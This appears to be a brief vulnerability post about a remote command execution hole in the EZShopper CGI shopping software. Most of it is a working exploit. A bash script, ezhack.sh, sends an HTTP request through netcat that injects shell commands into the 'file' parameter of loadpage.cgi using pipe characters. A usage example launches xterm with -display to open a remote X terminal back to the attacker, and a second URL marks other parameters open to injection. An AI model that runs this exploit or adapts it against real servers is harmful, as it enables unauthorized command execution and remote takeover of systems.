|
EZShopper Remote Command Execution Vulnerability
[ cut --- ezhack.sh ] #!/bin/bash echo -e "GET http: //www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080 [ /cut ] $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display% (this would send an xterm from the target host to wherever display is) http: //www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1 |
|
|
Privacy Statement |
